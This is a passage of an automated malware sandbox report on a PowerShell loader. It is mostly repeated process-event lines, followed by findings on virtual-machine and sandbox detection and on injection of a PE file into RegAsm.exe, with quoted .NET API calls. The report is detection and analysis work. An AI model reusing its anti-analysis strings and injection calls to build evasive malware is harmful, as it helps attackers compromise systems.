                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1432, type: MEMORYSTR
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: RegAsm.exe, 00000007.00000002.2586589024.0000000003023000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2F90000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1582Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1610Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3121Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 3404Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 6414Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep count: 3121 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep count: 6656 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3416Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3416Thread sleep time: -33000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6768Thread sleep count: 3404 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3416Thread sleep time: -32891s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6768Thread sleep count: 6414 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3416Thread sleep time: -32766s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3416Thread sleep time: -32656s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3416Thread sleep time: -32547s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3416Thread sleep time: -32438s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3416Thread sleep time: -32313s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3416Thread sleep time: -32188s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3416Thread sleep time: -32063s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3416Thread sleep time: -31953s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3416Thread sleep time: -31813s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3416Thread sleep time: -31688s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 33000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 32891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 32766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 32656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 32547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 32438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 32313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 32188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 32063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 31953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 31813Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 31688Jump to behavior
                Source: RegAsm.exe, 00000007.00000002.2586589024.0000000003023000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|Xen4win32_process.handle='{0}'
                Source: RegAsm.exe, 00000007.00000002.2586589024.0000000003023000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmGuestLib.dllDselect * from Win32_ComputerSystem
                Source: RegAsm.exe, 00000007.00000002.2586589024.0000000003023000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                Source: RegAsm.exe, 00000007.00000002.2616549738.0000000005630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: amsi64_7844.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7704, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7844, type: MEMORYSTR
                .NET source code references suspicious native API functions
                Source: 4.2.powershell.exe.23096c50000.0.raw.unpack, Progrgdfam3.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                Source: 4.2.powershell.exe.23096c50000.0.raw.unpack, Progrgdfam3.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                Source: 4.2.powershell.exe.23096c50000.0.raw.unpack, Progrgdfam3.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
                Source: 4.2.powershell.exe.23096c50000.0.raw.unpack, Progrgdfam3.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
                Source: 4.2.powershell.exe.23096c50000.0.raw.unpack, Progrgdfam3.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, payload, bufferSize, ref bytesRead)
                Injects a PE file into a foreign processes
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45C000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45E000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C02008Jump to behavior
